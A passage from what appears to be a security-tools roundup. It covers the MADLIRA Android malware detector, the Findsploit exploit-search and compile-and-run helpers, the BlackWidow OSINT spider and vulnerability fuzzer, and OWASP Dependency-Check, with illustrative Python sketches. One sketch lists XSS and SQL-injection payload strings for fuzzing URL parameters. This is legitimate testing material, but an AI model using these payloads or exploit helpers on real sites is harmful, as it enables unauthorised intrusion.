Compute the malicious specifications for the given training data.
-B <filename>: the archive file containing all graphs of the training benwares.
-M <filename>: the archive file containing all categories of the training malwares.

MADLIRA TFIDF check <Options>
Check for malicious behaviors in the applications in a given folder.
-S <folder>: the folder containing all applications (apk files).

MADLIRA TFIDF test <Options>
Test the classifier on given test data.
-S <folder>: the folder containing all graphs for testing.

MADLIRA TFIDF clear
Clean all training data.

MADLIRA TFIDF install
Clean old training data and install new training data.
-B <filename>: the archive file containing all graphs of the training benwares.
-M <filename>: the archive file containing all categories of the training malwares.

Examples:
Training new data:
  • First collect training applications (APK files) and store them in folders named MalApkFolder and BenApkFolder.
  • Pack training applications into archive files named MalPack and BenPack by using this command:
MADLIRA TFIDF packAPK -PB BenApkFolder -B BenPack -PM MalApkFolder -M MalPack
  • Clean old training data:
MADLIRA TFIDF clear
  • Compute the malicious graphs from the training packs (BenPack and MalPack)
MADLIRA TFIDF train -B BenPack -M MalPack
Checking new applications:
  • Put these applications in a folder named checkApk and use this command:
MADLIRA TFIDF check -S checkApk
Output:


SVM component
Command: MADLIRA SVM
For this component, there are two functions: the training function and the test function.

Training phase
  • Collect benign applications in a folder named benignApkFolder and malicious applications in a folder named maliciousApkFolder.
  • Prepare training data by using the command:
MADLIRA SVM packAPK -PB benignApkFolder -B benignPack -PM maliciousApkFolder -M maliciousPack
  • Compute the training model by this command:
MADLIRA SVM train -B benignPack -M maliciousPack

Malicious behavior detection
  • Collect new applications and put them in a folder named checkApk.
  • Detect malicious behaviors of applications in the folder checkApk by using the command:
MADLIRA SVM check -S checkApk
Command:
MADLIRA SVM train <Options>
Compute the classifier for given training data.
-T <T>: max length of the common walks (default value = 3).
-l <lambda>: lambda value to control the importance of length of walks (default value = 0.4).
-B <filename>: the archive file containing all graphs of the training benwares.
-M <filename>: the archive file containing all graphs of the training malwares.
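The -T and -l options suggest a common-walks graph kernel, where a shared walk of length k is discounted by lambda**k. The sketch below is an assumption about the kernel's general shape, not MADLIRA's code: it counts label-matching walks up to length T in the product of two call graphs (including trivial length-0 walks), with made-up API labels.

```python
def common_walk_kernel(g1, g2, T=3, lam=0.4):
    """Sum over k = 0..T of lam**k times the number of label-matching
    walks of length k shared by the two graphs (via their product graph)."""
    labels1, edges1 = g1
    labels2, edges2 = g2
    # Product-graph nodes: node pairs carrying the same label
    nodes = [(u, v) for u in labels1 for v in labels2
             if labels1[u] == labels2[v]]
    adj = {n: [] for n in nodes}
    for (u1, v1) in edges1:
        for (u2, v2) in edges2:
            if (u1, u2) in adj and (v1, v2) in adj:
                adj[(u1, u2)].append((v1, v2))
    walks = {n: 1.0 for n in nodes}   # one length-0 walk per product node
    k = sum(walks.values())           # lam**0 contribution
    for length in range(1, T + 1):
        nxt = {n: 0.0 for n in nodes}
        for n, count in walks.items():
            for m in adj[n]:
                nxt[m] += count       # extend every walk by one matching edge
        walks = nxt
        k += lam ** length * sum(walks.values())
    return k

# Tiny call graphs: labels map node ids to API names, edges are call order
g = ({1: "onCreate", 2: "getDeviceId", 3: "sendTextMessage"},
     [(1, 2), (2, 3)])
score = common_walk_kernel(g, g, T=3, lam=0.5)   # self-similarity of the chain
```

Smaller lambda values shrink the contribution of long walks, which is what the -l option's "control the importance of length of walks" description hints at.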

MADLIRA SVM check <Options>
Check for malicious behaviors in the applications in a given folder.
-S <foldername>: the folder containing all apk files.

MADLIRA SVM test <Options>
Test the classifier on given graph data.
-S <foldername>: the folder containing all graphs of the test data.
-n <n>: the number of test samples.

MADLIRA SVM clear
Clean all training data.

Packages:
This tool uses the following packages:

References
  • Khanh Huu The Dam and Tayssir Touili. Extracting Android Malicious Behaviors. In Proceedings of ForSE 2017
  • Khanh Huu The Dam and Tayssir Touili. Learn Android malware. In Proceedings of IWSMA@ARES 2017


Findsploit - Find Exploits In Local And Online Databases Instantly


Findsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes "copysploit" to copy any Exploit-DB exploit to the current directory and "compilesploit" to automatically compile and run any C exploit (e.g. ./copysploit 1337.c && ./compilesploit 1337.c).
For updates to this script, type findsploit update

INSTALLATION
./install.sh

USAGE
Search for all exploits and modules using a single search term:
* findsploit <search_term_1> (e.g. findsploit apache)

Search multiple search terms:
* findsploit <search_term_1> <search_term_2> <search_term_3> ...

Show all NMap scripts:
* findsploit nmap

Search for all FTP NMap scripts:
* findsploit nmap | grep ftp

Show all Metasploit auxiliary modules:
* findsploit auxiliary

Show all Metasploit exploits:
* findsploit exploits

Show all Metasploit encoder modules:
* findsploit encoder

Show all Metasploit payloads modules:
* findsploit payloads

Search all Metasploit payloads for windows only payloads:
* findsploit payloads | grep windows
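Under the hood this kind of lookup is essentially a case-insensitive text match over a local exploit index. A hypothetical Python equivalent (the CSV excerpt, column names, and entries are made up for illustration, not taken from the script) looks like:

```python
import csv
import io

# Hypothetical excerpt of an exploit-db index file such as files_exploits.csv
SAMPLE = """id,file,description,platform
1337,exploits/linux/local/1337.c,Apache 2.x local exploit,linux
2048,exploits/windows/remote/2048.py,ProFTPD remote overflow,windows
"""

def findsploit(term, index=SAMPLE):
    """Case-insensitive match on the description column, roughly what the
    bash script achieves by piping the index through grep."""
    rows = csv.DictReader(io.StringIO(index))
    return [row for row in rows if term.lower() in row["description"].lower()]

hits = findsploit("apache")
```

Chaining a second filter (as in `findsploit nmap | grep ftp`) corresponds to calling the function and filtering its result list again.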


BlackWidow - A Python Based Web Application Scanner To Gather OSINT And Fuzz For OWASP Vulnerabilities On A Target Website


BlackWidow is a Python-based web application spider that gathers subdomains, URLs, dynamic parameters, email addresses, and phone numbers from a target website. This project also includes the Inject-X fuzzer, which scans dynamic URLs for common OWASP vulnerabilities.

DEMO VIDEO:


FEATURES:
  • Automatically collect all URLs from a target website
  • Automatically collect all dynamic URLs and parameters from a target website
  • Automatically collect all subdomains from a target website
  • Automatically collect all phone numbers from a target website
  • Automatically collect all email addresses from a target website
  • Automatically collect all form URLs from a target website
  • Automatically scan/fuzz for common OWASP Top 10 vulnerabilities
  • Automatically saves all data into sorted text files

LINUX INSTALL:
cp blackwidow /usr/bin/blackwidow 
cp injectx.py /usr/bin/injectx.py
pip install -r requirements.txt

USAGE:
blackwidow -u https://target.com - crawl target.com with 3 levels of depth.
blackwidow -d target.com -l 5 - crawl the domain: target.com with 5 levels of depth.
blackwidow -d target.com -l 5 -c 'test=test' - crawl the domain: target.com with 5 levels of depth using the cookie 'test=test'
blackwidow -d target.com -l 5 -s y - crawl the domain: target.com with 5 levels of depth and fuzz all unique parameters for OWASP vulnerabilities.
injectx.py https://test.com/users.php?user=1&admin=true - Fuzz all GET parameters for common OWASP vulnerabilities.
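Conceptually, this style of GET-parameter fuzzing substitutes a payload into one query parameter at a time while leaving the others intact. A minimal sketch (the payload list is illustrative, not BlackWidow's actual set) could look like:

```python
from urllib.parse import urlsplit, parse_qsl, urlencode, urlunsplit

# Hypothetical payloads standing in for common OWASP probes (XSS, SQLi)
PAYLOADS = ["'\"><script>alert(1)</script>", "' OR '1'='1"]

def fuzz_urls(url):
    """Yield one URL per (parameter, payload) pair, mutating a single
    GET parameter at a time while keeping the rest of the query intact."""
    scheme, netloc, path, query, frag = urlsplit(url)
    params = parse_qsl(query, keep_blank_values=True)
    for i, (name, _) in enumerate(params):
        for payload in PAYLOADS:
            mutated = params[:i] + [(name, payload)] + params[i + 1:]
            yield urlunsplit((scheme, netloc, path, urlencode(mutated), frag))

urls = list(fuzz_urls("https://test.com/users.php?user=1&admin=true"))
# 2 parameters x 2 payloads -> 4 candidate URLs to request and inspect
```

A scanner would then request each candidate URL and look for reflected payloads or database error strings in the responses.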

DOCKER:
git clone https://github.com/1N3/BlackWidow.git
cd BlackWidow
docker build -t blackwidow .
docker run -it blackwidow # Defaults to --help

OWASP DependencyCheck - A Software Composition Analysis Utility That Detects Publicly Disclosed Vulnerabilities In Application Dependencies


Dependency-Check is a utility that attempts to detect publicly disclosed vulnerabilities contained within project dependencies. It does this by determining if there is a Common Platform Enumeration (CPE) identifier for a given dependency. If found, it will generate a report linking to the associated CVE entries.
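As a mental model of the CPE lookup, the sketch below compares a dependency's coordinates against CPE 2.3 identifiers. This is a deliberately simplified stand-in for Dependency-Check's real evidence-based analyzer; the CPE entries and the matching rule are illustrative assumptions.

```python
# Each CPE 2.3 identifier has the shape cpe:2.3:part:vendor:product:version:...
def parse_cpe(cpe):
    parts = cpe.split(":")
    return {"vendor": parts[3], "product": parts[4], "version": parts[5]}

def match(dep, cpes):
    """Return the CPE identifiers whose product and version agree with the
    dependency's evidence ('*' matches any version)."""
    hits = []
    for cpe in cpes:
        c = parse_cpe(cpe)
        if c["product"] == dep["product"] and c["version"] in (dep["version"], "*"):
            hits.append(cpe)
    return hits

known = [
    "cpe:2.3:a:apache:commons_collections:3.2.1:*:*:*:*:*:*:*",
    "cpe:2.3:a:apache:commons_collections:4.0:*:*:*:*:*:*:*",
]
dep = {"product": "commons_collections", "version": "3.2.1"}
vulnerable = match(dep, known)
```

Once a dependency maps to a CPE identifier, the associated CVE entries for that identifier can be pulled into the report.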
Documentation and links to production binary releases can be found on the GitHub pages. Additionally, more information about the architecture and ways to extend dependency-check can be found on the wiki.

Current Releases

Jenkins Plugin
For instructions on the use of the Jenkins plugin please see the OWASP Dependency-Check Plugin page.

Command Line
More detailed instructions can be found on the dependency-check GitHub pages. The latest CLI can be downloaded from Bintray's dependency-check page.
On *nix
$ ./bin/dependency-check.sh -h
$ ./bin/dependency-check.sh --project Testing --out . --scan [path to jar files to be scanned]
On Windows
> .\bin\dependency-check.bat -h
> .\bin\dependency-check.bat --project Testing --out . --scan [path to jar files to be scanned]
On Mac with Homebrew
$ brew update && brew install dependency-check
$ dependency-check -h
$ dependency-check --project Testing --out . --scan [path to jar files to be scanned]

Maven Plugin
More detailed instructions can be found on the dependency-check-maven GitHub pages. By default, the plugin is tied to the verify phase (i.e. mvn verify). Alternatively, one can directly invoke the plugin via mvn org.owasp:dependency-check-maven:check.
The dependency-check plugin can be configured using the following:
<project>
    <build>
        <plugins>
            ...
            <plugin>
                <groupId>org.owasp</groupId>
                <artifactId>dependency-check-maven</artifactId>
                <executions>
                    <execution>
                        <goals>
                            <goal>check</goal>
                        </goals>
                    </execution>
                </executions>
            </plugin>
            ...
        </plugins>
        ...
    </build>
    ...
</project>

Ant Task
For instructions on the use of the Ant Task, please see the dependency-check-ant GitHub page.

Development Usage
The following instructions outline how to compile and use the current snapshot. While the intent is to keep the snapshot stable, it is recommended that the release versions listed above be used.
The repository has some large files due to test resources. The team has tried to clean up the history as much as possible; even so, it is recommended that you perform a shallow clone to save yourself time:
git clone --depth 1 git@github.com:jeremylong/DependencyCheck.git
On *nix
$ mvn install
$ ./dependency-check-cli/target/release/bin/dependency-check.sh -h
$ ./dependency-check-cli/target/release/bin/dependency-check.sh --project Testing --out . --scan ./src/test/resources
On Windows
> mvn install
> .\dependency-check-cli\target\release\bin\dependency-check.bat -h
> .\dependency-check-cli\target\release\bin\dependency-check.bat --project Testing --out . --scan ./src/test/resources
Then load the resulting 'dependency-check-report.html' into your favorite browser.

Docker
In the following example it is assumed that the source to be checked is in the current working directory. Persistent data and report directories are used, allowing you to destroy the container after running.
#!/bin/sh

OWASPDC_DIRECTORY=$HOME/OWASP-Dependency-Check
DATA_DIRECTORY="$OWASPDC_DIRECTORY/data"
REPORT_DIRECTORY="$OWASPDC_DIRECTORY/reports"

if [ ! -d "$DATA_DIRECTORY" ]; then
    echo "Initially creating persistent directories"
    mkdir -p "$DATA_DIRECTORY"
    chmod -R 777 "$DATA_DIRECTORY"

    mkdir -p "$REPORT_DIRECTORY"
    chmod -R 777 "$REPORT_DIRECTORY"
fi

# Make sure we are using the latest version
docker pull owasp/dependency-check

docker run --rm \
    --volume $(pwd):/src \
    --volume "$DATA_DIRECTORY":/usr/share/dependency-check/data \
    --volume "$REPORT_DIRECTORY":/report \
    owasp/dependency-check \
    --scan /src \
    --format "ALL" \
    --project "My OWASP Dependency Check Project"
# Use suppression like this: (/src == $pwd)
# --suppression "/src/security/dependency-check-suppression.xml"

Upgrade Notes

Upgrading from 1.x.x to 2.x.x
Note that when upgrading from version 1.x.x, the following changes will need to be made to your configuration.

Suppression file
In order to support multiple suppression files, the mechanism for configuring them has changed. As such, users that have defined a suppression file in their configuration will need to update it.
See the examples below:

Ant
Old:
<dependency-check
    failBuildOnCVSS="3"
    suppressionFile="suppression.xml">
</dependency-check>
New:
<dependency-check
    failBuildOnCVSS="3">
    <suppressionFile path="suppression.xml" />
</dependency-check>

Maven
Old:
<plugin>
    <groupId>org.owasp</groupId>
    <artifactId>dependency-check-maven</artifactId>
    <configuration>
        <suppressionFile>suppression.xml</suppressionFile>
    </configuration>
</plugin>
New:
<plugin>
    <groupId>org.owasp</groupId>
    <artifactId>dependency-check-maven</artifactId>
    <configuration>
        <suppressionFiles>
            <suppressionFile>suppression.xml</suppressionFile>
        </suppressionFiles>
    </configuration>
</plugin>

Gradle
In addition to the changes to the suppression file, the task dependencyCheck has been renamed to dependencyCheckAnalyze.
Old:
buildscript {
    repositories {
        mavenLocal()
    }
    dependencies {
        classpath 'org.owasp:dependency-check-gradle:2.0.1-SNAPSHOT'
    }
}
apply plugin: 'org.owasp.dependencycheck'

dependencyCheck {
    suppressionFile = 'path/to/suppression.xml'
}
check.dependsOn dependencyCheckAnalyze
New:
buildscript {
    repositories {
        mavenLocal()
    }
    dependencies {
        classpath 'org.owasp:dependency-check-gradle:2.0.1-SNAPSHOT'
    }
}
apply plugin: 'org.owasp.dependencycheck'

dependencyCheck {
    suppressionFiles = ['path/to/suppression1.xml', 'path/to/suppression2.xml']
}
check.dependsOn dependencyCheckAnalyze

